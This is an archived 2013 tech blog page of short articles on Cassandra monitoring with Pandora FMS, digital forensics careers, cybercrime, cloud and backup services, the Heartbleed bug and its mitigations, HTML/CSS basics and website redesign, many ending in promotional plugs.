Archive for 2013

Pandora FMS Apache Cassandra Monitoring

Facebook created Cassandra DB to power their Inbox Search feature in 2008, and Twitter announced they would use Cassandra because it can be run on large server clusters and is capable of taking in very large amounts of data in 2010. Nowadays, Cassandra is an Apache top-level project, also knows as Apache Cassandra.
To manage lots of data the importance of monitoring this part of the architecture is increasing. If you use Cassandra, you will want to know how to monitor it.
What is Apache Cassandra?
Apache Cassandra is an open source distributed database management system designed to handle large amounts of data across many commodity servers, providing high availability with no single point of failure. Cassandra offers robust support for clusters spanning multiple data centers, with asynchronous masterless replication allowing low latency operations for all clients.
How to collect data
The Cassandra data extraction is being done basically through the execution of commands in the Operative System. The CQLsh client is used to run CQL commands and the general log files of Cassandra are used to retrieve info too.
Parameters that we will retrieve from Cassandra are described below:
  • Cassandra_Process: Displays information on the status of the cassandra process.
  • Cassandra_CPU_Usage: Displays the cpu use for the cassandra process in %.
  • Cassandra_Memory_Use: Displays the memory use for the cassandra process in %.
  • Cassandra_Error_Log_Messages: Displays the amount of error messages in the cassandra log.
  • Cassandra_Warning_Log_Messages: Displays the amount of warning messages in the cassandra log.
  • Cassandra_Network_Connections: Displays the amount of network connections by clients.
  • Cassandra_Thrift_Server_Status: Displays the status of the thrift server.
  • Cassandra_Cluster_Status: Displays the status of the main Cluster.
  • Cassandra_Key_Cache_Size: Displays the size of the key cache in kbs.
  • Cassandra_Active_Commands: Displays the amount of active commands or task being executed.
  • Cassandra_Pending_Commands: Displays the amount of pending commands.
  • Cassandra_Completed_Commands: Displays the amount of completed commands.
  • Cassandra_Active_Responses: Displays the amount of active responses to commands executed by cassandra.
  • Cassandra_Pending_Responses: Displays the amount of pending responses to commands.
  • Cassandra_Completed_Responses: Displays the amount of completed responses to commands.
  • Cassandra_Nodetool_Configuration: Detects if Nodetool is working properly.
Parameters that would influence badly the performance of Cassandra:
  • Cassandra_ReadStage_Pool_Pending_Tasks
  • Cassandra_RequestResponseStage_Pool_Pending_Tasks
  • Cassandra_MutationStage_Pool_Pending_Tasks
  • Cassandra_ReadRepairStage_Pool_Pending_Tasks
  • Cassandra_ReplicateOnWriteStage_Pool_Pending_Tasks
  • Cassandra_GossipStage_Pool_Pending_Tasks
  • Cassandra_AntiEntropy_Pool_Pending_Tasks
  • Cassandra_MigrationStage_Pool_Pending_Tasks
  • Cassandra_MemoryMeter_Pool_Pending_Tasks
  • Cassandra_MemtablePostFlusher_Pool_Pending_Tasks
  • Cassandra_FlushWriter_Pool_Pending_Tasks
  • Cassandra_MiscStage_Pool_Pending_Tasks
  • Cassandra_PendingRangeCalculator_Pool_Pending_Tasks
  • Cassandra_ReplicateOnWriteStage_Pool_Pending_Tasks
  • Cassandra_Comitlog_archiver_Pool_Pending_Tasks
  • Cassandra_InternalResponseStage_Pool_Pending_Tasks
  • Cassandra_HintedHandoff_Pool_Pending_Tasks
To monitor Cassandra, we are going to use Pandora FMS.
This plugin is basically getting data executing commands in the Operative System, analyzing Cassandra's log and executing nodetool (Command line utility included on Cassandra's installation).
This plugin executes the commands and checks all the important values into software agent modules, XML formatted, ready to be sent to Pandora FMS Data Server.
Thus, we can download these prebuilt checks anytime, without having to develop them by ourselves.
With all this data in Pandora FMS, a complete world of possiblities is open up to you: Be warned by mail/sms when something goes wrong with using the alerts system. A complete events list with customizable filter available from your internet browser and even from your mobile device using our mobile apps. Generate on demand or receive periodically complete reports.

Tuesday, December 24, 2013
Posted by Unknown
0 Comments

How to Become a Digital Forensics Investigator

Digital forensics involves the using the scientific method for investigating and examining information from electronic media so as the information can be used as evidence in the courtroom. Investigating computing devices involves obtaining computer data without compromising it, examining suspect computer facts to figure out the particulars, such as, source and substance, displaying computer based facts to courts, and applying laws to digital findings. Digital forensics investigates data that has been retrieved from a computer's hard drive disk or some other memory media. Digital investigators retrieve data from a working laptop or a computer or its networked locations. The information you retrieve might already be on the hard disk drive, but it is not very easy to find and interpret. In contrast, network forensics yields information about how a perpetrator obtained entry to a computer network.
Education
It will help you to get a computer science degree, however that's not a necessity. You will need to have both professional education and several years of practical experience in the profession. It is helpful to get law enforcement training, nevertheless, that's generally not required. The majority of digital forensics experience is self-taught. The greatest digital forensics experts are insatiably interested in how and why personal computers function. They invest a lot of their hard work studying about software programs, electronics, additionally, they live for the pleasure of knowing the way everything works collectively. Each situation is unique, therefore the solution you wish is probably not in the articles, the discussion boards or CSI. Occasionally, you must experiment with your own well thought-out hypotheses. The capacity to develop insightful investigations as well as persistence to elicit the information is a necessity of an experienced digital forensic examiners. To understand how a file or meta data transforms once an individual performs a certain thing, you'll be ready to confirm when you've verified your hypothesis by skilled testing.
Realities
In the event that you'll be employed for/with law enforcement organizations, you will want a clear conviction record. Although you may only intend to be concerned with civil cases, if you'll be testifying in a courtroom, anything in your history that anyone can use to harm your integrity is going to be grasped upon by the opposite lawyer.
No matter if you begin in the Information Technology area or the law enforcement area, a quality digital forensics expert, you need specific characteristics. Like with all investigative professional, you need an inquisitive character - one which takes you to want to seek and make inquiries and persevere until you finally decide the solutions. To be a successful computer forensics investigator, you ought to be well-organized, because you'll be handling a lot of information but you still have to be capable of recognizing patterns and notice correlations. It is best to have exceptional observation abilities, and be able to notice both the fine details as well as the "big picture". You still need to be unbiased, allowing you to draw conclusions that aren't contingent upon your preconceptions or prejudices. Ultimately, you must be capable of systematically documenting your own investigations and often to be capable of delivering them to other people who don't have your professional understanding. This means you will need equally great writing ability and great language capabilities.

Tuesday, December 10, 2013
Posted by Unknown
0 Comments

Digital Security Equals Wealth

No growth is ever made without risk. Every good business owner knows this. The buck does not stop there though. I have been on the hunt for areas of interest in my own business where more risk can be taken and where some risk can be reined in as well.
"Business executives must take an active role in making policy part of the DNA of the company. The first step is a clear recognition of the financial risk to the organization should a breach occur due to noncompliance." -Bob Janacek, DataMotion
This means that not only would I increase the value of my data by securing it; I am actually decreasing that value by not securing it. Still, some companies like Google have already caught on to the idea of securing data by not securing it at all. Even though this makes for some big mistakes in consumer privacy issues if someone were to let say hack Google's server and steal user's information.
Several think tank leaders, including Sir Ken Robinson, have discussed Google X's work environment. In his popular TED Talk, Robinson said that mistakes must be made in order for innovative ideas to take place. In other words, there is no right or wrong answer in the knowledge economy of today.
How can you or your business capitalize from this movement?
DataMotion CTO Bob Janacek says that a best-practice approach to IT security and compliance centers on two key areas: effective communication about policies, and the use of appropriate transfer management tools and controls for corporate email, including on mobile devices.
Did you know that Google didn't track the hits you get from mobile and other devices? Until now, with Universal Analytics - Google's update to it's current Analytics platform; users will be able to see internet traffic in a whole new way. It offers support for an analytics.js library, and Mobile SDK or higher for Android and iOS. From what it looks like, Google has been urging developers to move all "properties" as they put it, over to the new Universal Analytics system. Making the move to know more about your organization's websites and the demographics thereof is a great move. It's much like the transfer of corporate databases to a more secure infrastructure.
After speaking with a representative from Trust-E Online, I am now sure they would center my IT department around our corporate policies. I went out and received a Digital Asset Appraisal and can now begin to see how much this risk is worth to the overall organization. It's well worth the investment in my business.
Guillermo J. Perry is the Platform Administrator for Marketeq Network. For more information on how to what you can do with a digital asset appraisal please visit: http://www.marketeqnetwork.com

Tuesday, November 19, 2013
Posted by Unknown
0 Comments

A Look Into Cybercrime

Cybercrime is defined as any criminal act involving computers, network infrastructures, and/or communication devices.
In the early years of conception, cybercrime was not as wide spread as it is today. It was usually committed by a rogue individual or a small group of individuals just looking to snoop around some company or personal information. A majority of the intrusions where an attempt to see just how deep they could penetrate without being discovered. The intentions of those individuals were not always criminal, however, their actions where considered to be, even though there was usually no permanent damage other than acts of snooping.
In a short amount of time, cybercrime rapidly evolved from snoopers into those seeking to extract information or deploy viruses. When you consider the evolution of cybercrime, it's similar to the evolution of the security of a bank. Early on, banks were far less complex then the banks of today so accessing them for information or financial gain was an easy process, i.e., banks from the early 1900's would have been far easier to access then the complex banks of today.
Today cybercrime is one of the fastest growing areas of crime. The issues surrounding cybercrime are far more complex and organized. It is evolving and spreading at an alarming rate. Organized crime syndicates work together to cover a wide range of cybercrime activities for the sole purpose of financial gain. Their intentions are criminal, and this pool of individuals continues to grow rapidly.
Because cybercrime is a faceless method of performing criminal acts, an increased number of criminals exploit the accessibility and anonymity that technology offers, and unlike most normal criminal activity, the challenges we face with cybercrime wont be met just at the local level. The global nature of the internet has provided the flexibility for criminals to perform nearly any illegal cybercrime, to anyone they choose, from any location around the world. This is a bad combination for a society that is becoming more interconnected through technology by the day.
Some modern methods of cybercrime include hacking, cracking, identity theft, internet fraud, cyber intrusions, bank fraud, corporate security breaches, spearfishing, and email fraud. Setting up defenses against cyber criminals will become increasingly harder for companies to keep up with demand. In fact many experts today believe we are not winning the battle against cybercrime, and that the amount of criminal hackers exceeds the amount of ethical hackers. A trend that does not seem to be changing anytime in the foreseeable future.
For a better and more complete understanding of Cybercrime please visit www.cybersecuritycompanies.com

Saturday, November 16, 2013
Posted by Unknown
0 Comments

Cloud Computing Applications

Cloud computing refers to accessing and storing programs and data online. A cloud computing system will have two ends, the computer user end and the cloud computing system end, which are connected through a network, generally the Internet. Cloud systems of today are known for their redundancy and subsequently reliability. This is also the reason why cloud services are so popular nowadays. In order to achieve this level of security, cloud computing companies use several servers and devices to make copies of the data they store. Because of its nature, the applications based on cloud technology are basically limitless. In fact, the cloud can theoretically execute any type of program a normal computer can run. There are several reasons why companies and individuals choose to use cloud technology to store data and run programs remotely. Following are just a few applications secure cloud services can offer.
The main reason why clients prefer to store data in the cloud is the fact that they will have access to it afterwards from anywhere in the world provided that they have an Internet connection. Important information will no longer be confined to a hard disk and you can use any type of device to access it. Another important reason why corporations and individuals prefer cloud computing is reducing the costs for hardware. A corporation will generally have great storage needs. In order to meet that demand, the internal network would need to be high end. Investing money in the most performant hardware that will soon be replaced on the market by faster and better systems will not pay off on the short or long term. Offering inexpensive terminals for all your employees, while using a cloud system to store information and run application would reduce the costs considerably. Besides the fact that companies would no longer be forced to invest money in hardware for each employee, they would also be exempt from paying software licenses for everyone in the company, because they could use the applications they need remotely through the cloud system.
When it comes to big corporations, the space and conditions necessary to store servers and all the other devices increase the company costs every month. Besides the physical space needed for a datacenter, a company would also need a team of specialists to maintain the servers and solve hardware and software problems. With cloud computing, all these expenses are removed and someone else will bear the responsibility of keeping your data secure and solve troubleshoots. IT support costs will be also greatly reduced, because you can also purchase another inexpensive terminal in an emergency instead of relying on repair services, not to mention that this type of system has less chances of failing. Last but not least on the list with benefits of cloud computing is its processing power. Cloud systems are not only redundant and highly reliable; they also have a greater power than normal servers. Usually, a server is not used to its full potential, but things have changed after the apparition of VPS and cloud services.

Sunday, September 8, 2013
Posted by Unknown
0 Comments

The Benefits of Online Backup Services

Companies these days generate a large amount of data every year and their storage needs become more pressing. Any responsible company needs a way to make sure its data is kept safely against any possible disaster. Everything from emails and presentations to financial information and every other document, needs to have a safe place to be stored. If a few years ago all companies had large storage rooms filled with files, these days the virtual alternative is preferred by most firms. Online backup offers people the chance to store their information safely and benefit from a great number of advantages.
The main advantage that a company or a person can gain from secure online backup is the fact that it can be done automatically. Back-up devices are available to everyone, but most people simply fail to do it regularly for various reason. Whether they forget or they just do not have the time, there comes a moment when something happens and they realize that a part of their information was lost. However, those who choose to hire an online backup service should know that their information will be automatically saved on various servers. In addition, that information is stored in multiple places, so in the event that a server might fail, the user can rest assured that his data will not be lost. Accessibility is probably the next important advantage that the users of this technology have. They will be able to access their information from anywhere they might be and use them accordingly.
All people who are thinking about choosing these services automatically think about data security. When you choose an experienced provider you will be able to benefit from a highly secure online backup service. There are many security measures that will be taken in order to protect the security of one's information and deliver the services people are expecting. Last but not least, a good service needs to be easy to use, even by those who are not very experienced with these systems. This is why people should make sure they choose a service that offers them an easy to use interface that is intuitive and allows them to do their tasks easily.
To conclude, online backup is the solution any company should consider in order to maintain all its data securely. Considering there are so many devices used within a company these days, it was only a matter of time before the need of having something that stored all the information generated in one place. This backup solution is what each company needs in order to have permanent access to everything and yet be sure everything is kept safely against any possible disaster or theft. There are many such service providers these days that offer their services for highly advantageous rates. Since everything is done online, to find these providers company administrators will have to do some research online, but they will surely find someone to offer them the services their company needs.
Are you looking for online backup services? To find secure online backup services please review these links.

Saturday, September 7, 2013
Posted by Unknown
0 Comments

Heartbleed Bug

According to Gary Davis, vice president of global marketing for McAfee Consumer division, it is important to understand that Heartbleed is not a virus, but an error programmed into the OpenSSL encryption code - a security standard that encrypts communications between you and the servers supplied by most online services.
Although the bug has been announced just recently, he has been present in OpenSSL versions released since March 14, 2012, giving several opportunities for attackers to steal certificates or other confidential information.
The problem is serious
The OpenSSL cryptographic library protects usernames, passwords, credit card, debit card and other confidential user information. A failure in the SSL code could allow an attacker to gain access to the system memory, which can potentially contain confidential information or communications.
SSL / TLS is widely used to secure communication through websites, email, instant messaging, etc.. It can be recognized by the prefix " https " or a lock in the address bar of a browser.
Therefore, the flaw allows attackers to extract information from large databases which contain usernames, passwords and other confidential information.
According to security company Vasco, and allow a hacker to get some memory of an impacted, under certain circumstances, the bug server also allows to obtain sensitive data that has been exchanged in the past through an SSL / TLS server vulnerable. Using the private key SSL / TLS implementation in a compromised Internet, the criminal can also give life to fake servers presenting graphically as the original.
As the threat takes advantage of servers, not consumer devices, online services companies need to upgrade to the latest version of OpenSSL to 1.0.1g in order to mitigate and fix this security hole.
Trustwave, meanwhile, warns that web servers are not the only possible targets for an attack; any program using a compromised version of OpenSSL and is exposed to the internet is vulnerable. This includes SSL virtual private network of a company that allows employees to connect to the corporate network security, SSL and many other tools that are used daily by businesses.
Also according to Trustwave, the OpenSLL is also considered one of the pillars of modernization of e- commerce, which allowed for the safe transmission of information, such as a credit card and personal identity. It is estimated that OpenSSL is used in 60% of web sites with SSL -enabled services. Although not all of these services are vulnerable, the effects of this failure are widespread.
Mobile apps have also been affected
Cell Phones and smartphones are just as vulnerable to the bug as Heartbleed sites. This is because applications connect to servers and Web services to complete various tasks, such as apps to banks and online stores that allow you to make payments via mobile phone.
Trend Micro surveyed some popular web services used in popular mobile devices and the results show that the vulnerability still exists. 390 thousand applications from Google Play, and about 1,300 applications connected to vulnerable servers found were scanned. Among them are 15 applications related to banks, 39 to 10 online payments and online purchases. Problems in everyday apps such as instant messaging and health were also identified.
What the surfer can do?
The severity of this threat is unimaginable. Large companies regularly employ OpenSSL, which is traditionally known as one of the safest means of transmitting data. Security firms reiterate that the best way to protect yourself is to determine the sites you use that were affected ( through the tools listed above) and change the passwords for these accounts.
That is, users should check with the sites shelter their sensitive information _ such as the email address of your bank, or your ISP e- mail, etc. _ if they were affected and, if so, ask how will be corrected this vulnerability.
If the provider confirms that the service was standard, users should also change their passwords. Companies that host their own SSL affected services should strongly consider revoking their current licenses, as if it is compromised can lead to abuse by users and damage to its reputation. Owners of SSL certificate that will work with Authorized Certificates ( CA ) to reissue their certifications.
This week, McAfee released a free tool to help consumers easily evaluate their susceptibility to the effects of Heartbleed. When you enter domain names of websites on testing tool McAfee, consumers can immediately determine if the sites they frequent are affected by this menace verifying that the sites have been updated to the version of OpenSSL that is not susceptible to the vulnerability.
It is also advisable to monitor the occurrence of unusual or suspicious activities in their email accounts, social networking, internet banking and other services on the network. If you notice something out of the ordinary, contact your respective service, requesting information on how to proceed.
Moreover, as Heartbleed failure is not a virus or a malicious program that can be " corrected " instantly only by the user, on your own computer, the National Secretary of the Ministry of Consumer Justiaça ( Senacon / MJ ) warning Internet users to stay tuned to misleading offers services that address the issue.
And service providers?
The Senacon / MJ recommends that providers of Internet service applications inform customers and consumers, or if the service was not affected by the security flaw Heartbleed. If so, also inform the security measures that must be taken by their consumers.
What financial institutions should do?
According to Vasco, they must meet three steps to ensure that their web applications are not vulnerable to the bug and that their consumers are protected.
Firstly, should check their e-banking applications employ a version of OpenSSL fails. The Open SSL 1.0.1 to 1.0.1f versions are affected. In this case, they should immediately update their servers with the latest version.
Secondly, they should assume their private key SSL / TLS can be compromised if used affected the Open SSL versions. Because of the nature of the bug, it is very difficult to determine when the keys are compromised. In addition, financial institutions should be cautious and replace your existing keys and their certificates with new ones.
Finally, to verify whether sensitive data like passwords, exchanged with users of e-banking have been compromised. If so, the renewal of that information when possible should be promoted.
The users of e-banking should do?
Also according to Vasco, they may have been affected by the bug Heartbleed making sensitive data exchanged with their banks via the Internet may have been compromised.
Users accessing via password must exchange them, since they may have been compromised. However, this should only be done after the bank upgraded your OpenSSL software and issued new certificates and new private keys, because otherwise the new passwords can also be accessed improperly in the future.
On the other hand, users who access their passwords for single use ( one-time passwords - OTP ) need not worry about compromising your information. The ephemeral nature of this system ensures that the password can be used only for a short period of time. Thus, no single use passwords can not be leveraged as a result of this bug.
" We also recommend that everyone monitor their bank online and take care of the security of their information," said Claudio Conceição, consultant Finance and credit expert at Riddle TransUnion, company responsible for developing software and solutions for the automation of credit analysis, risk and fraud.
Beware of phishing
Many online services are sending e- mails informing you that were affected by Heartbleed and have already upgraded their servers. After receiving these emails, you must update your password. But beware: McAfee warns that this is also a great time for phishing attacks ( attacks disguised as services to steal your data and passwords ). So you need to take even more care than usual when they encounter such messages.
According to McAfee, the Internet can detect a phishing attack observing grammar errors, suspicious images that do not appear to be reputable and emails that ask you to enter your username and password now. Some services affected by Heartbleed have done logout from your account automatically. Some may have provided links to password change.
To protect yourself against phishing attacks, do not click on these links. Instead, go to the site manually, log in and then change your password.
Care to change passwords
By changing the passwords you need to take some care. Among them, according to McAfee, are:
1 - Create unique passwords for each site you use. Each password used must be at least eight characters long and contain letters, numbers and symbols. Each site must have its own unique password. Avoid using the same password on multiple sites. This is essential.
2 - Use a password manager. Increasingly, the use of password managers are no longer a matter of practicality and more a matter of safety. Remember different passwords for each site is very difficult. Password managers can do this for you. Moreover, they can protect you from malicious software that record the keys you press and consequently your password.
3 - Turn on two-factor authentication. The two-factor authentication is a security technique that requires something you know, such as your password, and something that you own, like your phone. Not all sites apply this security technique, but, when available, you should enable it. It can be an effective way to protect against hacker attacks.

Tuesday, August 27, 2013
Posted by Unknown
0 Comments

ASUS Looks to Enter the Cloud Storage Market

The word is out, individuals and businesses are turning to the cloud for data storage. For many, the primary reason is that the cloud is the easiest, surest way to back up photos, e-mails, documents and especially data. Others choose the cloud because of freed up space - the cloud makes a great storage option if the sheer volume of data on your computer depletes storage capacity.
But for many computer users, there is a fear of the unknown: Are my files really safe in the cloud, or do I need to back up the backup? The debate has gotten more intense as cloud data storage has become widespread - despite some recent well publicized failures.
The world's fifth largest PC vendor, Asustek Computer Inc., is looking to expand into the cloud service space in a big way with its unveiling of the ASUS Cloud Platform, an updated rendition of their WebStorage file hosting service.
ASUS announced on May 27th that their rebranded cloud platform will now cost $22.99 US a year for 100 gigabytes of cloud storage. The 70 percent price drop puts them in a prime competitive position with the biggest cloud service providers in the US, which offer the same storage capacity for $99 (DropBox) and $23.88 (Google). They also have a 500 gigabyte option, available for $99.99 a year.
The new Cloud Platform is designed to attract more individual and enterprise users with its simple interface and useful features, and the PC giant expects 50 million users by the end of the year, a rise of over 60% of its current base.
Despite the already large install base, ASUS stated that only about 0.5 - 1% of their users pay subscription fees, as they offer up to 5 gigabytes of storage for free for individual users. The company plans on raising that percentage to over 1% this year, hoping that the improvements in their service and the much smaller entry fee will persuade customers into paying for extra storage.
With the increased reliability on cloud storage to share files across mobile devices, ASUS sees the online data storage industry as an ever-expanding market and an opportunity to branch into the role of a service provider. The hardware giant is looking to follow in the footsteps of companies like Google, Microsoft, and Amazon to provide cloud services to customers at little or no cost, and entice businesses with large storage options at very affordable price points.
In addition to the enterprise and individual customers, ASUS intends to appeal to app developers by offering plenty of useful tools for software coding across different platforms. The tools are meant to "help developers and businesses manage large amounts of data backed by cloud computing technologies" and come included with the service.
ASUS plans to set up a new data center in Taipei to install more servers for its storage platform. The new center is set to open later this year, joining their six current data centers, with three in Taiwan and one in China, the US, and Luxembourg.
Tanya Freedman is co-founder and Vice-President of Connetics, a specialty recruiting firm, dedicated to placing storage and networking professionals. She has completed over 300 executive assignments in the past 10 years with almost 100% retention for companies ranging from Fortune 500 firms to entrepreneurial start-ups. She holds a Bachelor's and Master's degree in Psychology from the University of Witwatersrand (South Africa). http://www.conneticsusa.com/communications


Wednesday, August 21, 2013
Posted by Unknown
0 Comments

Backups and Their Issues While Restoring

Since the engineering science is now overlapping in our everyday animations, we are growing dependent on it. I would rather say that a person, now, feels incomplete if he/she is not connected with the technology. Let's just talk about Computers now.
We are very well aware of the fact that Computers have made our lives simpler and easier. But parallel, it has made us very lethargic. I'm sure most of you would agree with this. But if you are thinking, why I used the word Lethargic, I'll tell you a very simple reason for that.
There's a very simple reason behind this. We are more into typing on the computer than writing on paper. We prefer to save all our documents online. It has provided us an ease to save our crucial data and keep it intact. And with the passing time, everyone has learnt to keep their data as a backup, as virus attacks and system failures can infect for crucial files and make them unusable.
Let's Backup
Backing up the data is a common task performed by people all over the world. Usually backup is done by NT-Backup Utility which is a pre-built utility provided by the Windows Operating System. And the other utility competing with this is widely known as Backup Exec (formerly known as VERITAS) by Symantec.
NT-Backup.Exe
NT-Backup.Exe is a window utility which is given by Windows which performs backup on the individual's computer. It can back up all the data in your machine and give you an output in BKF format. This is basically an Extension to the file, created after the backup operation takes place..
VERITAS by Symantec
Backup Exec software is one of the leading organizations making Storage Software. And as most of us would be knowing Symantec is another one of the reputed organizations in providing security tools. In the year 2005, Symantec and VERITAS merged together and became the worldwide leaders providing Storage and Security Software.
Users can also do the backup in their Computers using the above mentioned third-party utility. The output here after the backup, is also in BKF Format.
Assumption
Say you have performed a backup in your computer. Be it NT-Backup utility that you used or BE or VERITAS. Once you have performed the backup, you save your backup in an External Storage device.
Now you have performed a fresh installation on your computer. Once it is completed, the BKF file is now copied in the newly installed Operating System.
Oops!
You are not able to restore your crucial data. Started getting errors like "Invalid BKF file "or the source file is invalid. But let me share the most important thing now. Snatching your hairs or getting frustrated cannot help you. Let me help then!
There are many third-party tools available in the market which can take the pain for you and resolve such issues in few minutes. You may search some on Google and opt a tool according to your need. Mostly all the third-party Software companies offer a version, which is easily available on the developer's websites. You may try the recovery using the Demo version and decide which you would buy.
SysInfoTools Backup Exec BKF Repair Pro provides the best solution for recovering your Crucial data from the corrupted BKF or backup files.


Sunday, July 14, 2013
Posted by Unknown
0 Comments

Buying and Selling High Quality Source Codes

Codes are an important component of any application or website. Coding can be quite demanding and time consuming. Sometimes, a programmer may not have enough time to complete the task that a client has asked for. Fortunately, there are plenty of codes that are available for sale. These codes can enable them to complete an application in a way that will satisfy their client. This also enables people who can write innovative codes to get some money for their work. In the end, everyone will be happy.
Why would anyone think of buying source codes?
Anyone who has ever written an application or designed a website knows that the framework or the code is the most time consuming and difficult part of the process. There are developers who spend weeks and even months writing the code for a project and event testing it to ensure that it works. They also spend a lot of time testing and correcting the bugs. The developer may have to tweak the code, try it out, and sometimes even start from scratch in case of a problem. Ready-made code will make it easier for the developer to save on time.
Furthermore, they will be able to concentrate their attention and efforts on other details of the application. Putting out an application quickly will help the company to beat the competition. For most companies, it is better to spend money to save time than to spend time in order to save some money.
Where can one buy the source code?
There are a number of internet markets that provide high quality source codes that are bug-free. It is always better to conduct a proper research and to read reviews in order to get the best codes for an application. There are some sites that even allow individuals to buy the full rights to a code or an app, but this can be quite expensive.
There are also some individual developers who advertise their work all over the internet, especially on social media networks. However, a buyer should always proceed with caution when dealing with independent coders. This is because they are not affiliated with any market, and they can disappear without a trace. Furthermore, the quality of the codes cannot be verified as there are no reviews that speak well of the coder.
How can one buy source codes
In commercial marketplaces, a buyer has to register before they can purchase the codes. After registering, the potential buyer can scan the boards in order to find the source code that they need. They can also use the search function to get the source code that they need.
After they select the ideal code, they can contact the seller and negotiate a price with them. There are instances where the price has already been listed, and the buyer simply has to purchase the code. After the purchase, they will get all of the code files, as well as any images and sounds that are part of the code.
There are a lot of developers who offer customer support as well as updates for the code that they write.
A lot of developers have benefited from this code markets. Those who write code have been able to make some good money for their efforts. Furthermore, those who would like to complete a project have managed to get some quality code that has helped them to save a lot of time and effort. Codes can be purchased in almost any programming language, including Python, PHP Scripts, Java and even mobile codes.
Want to buy or sell your codes? Get PHP Scripts and high quality WordPress Plugins that will help you to complete your app or web projects in a timely manner.

Saturday, June 15, 2013
Posted by Unknown
0 Comments

How HTML and CSS Work Together

HTML stands for Hyper Text Markup Language and it's used behind the scenes to construct the layout of website pages. Forget about the fancy colors, images and slide shows for a minute and think about a research paper that needs an introduction, body and conclusion. The introduction is always at the top of the page, the body is in the middle and the conclusion is at the bottom.
HTML is used to set up blocks of pages into table formats. First there's a <header>, then a <body> and finally a <footer>. Those HTML tags open the section and a backslash closes them. For instance, all of the header information will be placed between <header> and </header> and all of the footer information is placed between <footer> and </footer>. From there you can add variables to each section as you see fit.
<header width="800" height="250"> HEADER IMAGE </header>
Numbers in HTML equate to pixels, so the header section of code above will be 800 pixels wide and 250 pixels high. You can create an image in a simple paint program, save it, and use it in your header section like this:
<header width="800" height="250"> <img src="your-header-image.jpg"> </header>
Then you can start your body section: <body> This is my first website using HTML </body>
Be sure to end your header section before starting your body section. If you haven't heard of CSS, Cascading Style Sheet, you should start to familiarize yourself with that language at the same time because the two go hand in hand. CSS is used to make the background of the page green, the header section red, the color of your links blue, the font size and colors of each section and much more.
For instance, CSS will designate all <header> text to be Times New Roman, while all <body> text is Currier New. Also, every time you create a <table></table> the contents will be centered in each field. CSS coding is done on a separate document so that it controls your entire website design from a single page. For instance, it would be easy for me to change the height of the <header height="250"> by going into the HTML and changing it. However, what if I already copied and pasted the header onto 500 other pages? It wouldn't make sense to go into 500 pages to change a little piece of information.
CSS Page: header {height:250px;}
HTML Page: <header> IMAGE </header>
Now, every single <header> section of my website will be set at a height of 250 pixels. If I change it on the CSS page it will also change across every page of my website. That's why it's important to incorporate the two languages together at the beginning of your project.
Don't overwhelm yourself with every single line of code in HTML and CSS because, before you know it, you'll be moving onto a more advanced coding language such as PHP. You can use websites online to find particular lines of code you need each time you need it. Before you dive into code you should have drawn a basic layout of what you want to create. Then search, "HTML code to change header width" or "CSS code to insert background image". Try not to get frustrated if your code isn't working, trust me it's YOU making the mistake. If you forget a "/" or a ">" to close a tag your code will not work.
Creating Visits is a company in New Hampshire that builds websites using HTML and CSS. We also offer NH SEO services if you want to show up in search engines for certain keywords and phrases.


Tuesday, June 11, 2013
Posted by Unknown
0 Comments

Is Your Website Still Current and Generating Traffic?

One of the biggest problems companies face these days is losing traffic on their website. Over time a site can become old, boring and out of date, which means that companies need to consider a professional website redesign service to get them current, trendy and help them generate traffic again.
There are so many aspects which need to be taken into consideration and a number of steps that need to be followed to ensure the new website redesign is going to offer you the results you expect.
You may consider to redesign your site when you realize that you aren't getting the results you used to get, maybe your online revenue has dropped and your traffic has decreased. Your site purpose may have changed since you first launched your site and you need to make the necessary changes to meet your business objectives.
Other reasons include the site not working, it's not responsive anymore which results in a loss of traffic and leads, not to mention revenue. The content may be outdated or your competitors may just have launched a new and updated site and you feel it's time you put some effort in and make some changes of your own to stay current with competitors and have a chance at obtaining some of the market.
Before you consider a professional website redesign, you need to ask yourself why you want to change. Is there a reason which warrants doing this right now? Do you feel your site is lagging behind in terms of content, responsiveness, current trends and social media?
Next you will want to discuss your expectations and requirements with your designer and tell them how you want the site to be. It should be easy to navigate, user friendly and appeal to your audience.
It is very important that you don't change your URL. Keep that the same to avoid confusion and save yourself a fortune in reprinting printed materials. Also ensure that you know which of your pages are still performing and try not to change too much on them.
Remember when it comes to search engine optimization, some of your pages may be enjoying high rankings in search results, these are pages that shouldn't be played with and rather left. They may be added to the site under the same page name, making changes too many of the other pages, but ensure you leave your performing pages alone, enabling you to ensure that you don't compromise your search engine results in any way.
Companies rely on their search results rankings dramatically, so bear this in mind and discuss this with your professional website redesign team before any work starts.
Once the site has been looked at and the necessary changes have been made, have it tested. Don't only test it yourself, maybe consider a load test, ensuring it can meet the demands of your customers, be responsive and quick and work to the highest standard.
Finally, know your expectations and ensure they are reasonable. Choosing a professional website redesign doesn't mean your site will suddenly increase in traffic and revenue. This takes time and work.
You cannot rely on the site alone, you will need to promote the fact that you have a new site and ensure that this news reaches your target audience.
Professional website redesign services are a necessary consideration for many companies ensuring they stay current and enjoy ongoing traffic, generate leads and increase online revenue.
Be honest with your website redesign team on what you want and what you expect to achieve, let them make recommendations on how to change your site to help you achieve this.
InnoDojo is an online market place which caters for website redesigns, logos, marketing campaigns and more. The site is a meeting place for designers and consultants, a place where they can market their services, bid on projects and so much more.


Article Source: http://EzineArticles.com/8534921
Thursday, May 30, 2013
Posted by Unknown
0 Comments

A Website Redesign Process to Achieve Results

Companies often consider a website redesign when they feel their sites aren't performing as they should. There are a number of reasons to make changes to a site, from poor performance to not working and low traffic to responsiveness issues and so much more.
Before you choose to make any drastic changes it's important to put a process in place, which can ensure your designer achieves the results you are looking to achieve.
The first step to any website redesign process is to know your current traffic results, the keywords that generate the most interest and your average sales generated from the site. These are important starting points, ensuring your new site exceeds these expectations.
Next you'll want to determine your goals, most companies have the same goals in mind. You will probably want to increase the number of visitors to your site on a daily basis, you will want to generate more leads, increase your sales and incorporate SEO (search engine optimization) into your pages to improve your business ranking in search results.
Once you have chosen a designer, it's important to work closely with them throughout the entire website redesign process from the research stages where you determine which of your keywords are performing to the development stages. This can help you keep your finger on the pulse and make any necessary changes as and when you feel it is needed.
Next you will want to take a look at your target audience. Consider gender, age group and interest of this group. Your new site should be based around your audience, ensuring you reach a wider audience with ease once you launch your new site.
Branding is important and you don't want to make any obvious changes to your logo, name or slogan. Updating your logo to be more current is advisable, but it shouldn't be so extreme that no one recognizes you. This is very important if you have been in business for years and everyone knows and recognizes your name and logo. Large global companies such as Pepsi, Yahoo and more have changed their branding over the years, being current and trendy without venturing too far away from their original design.
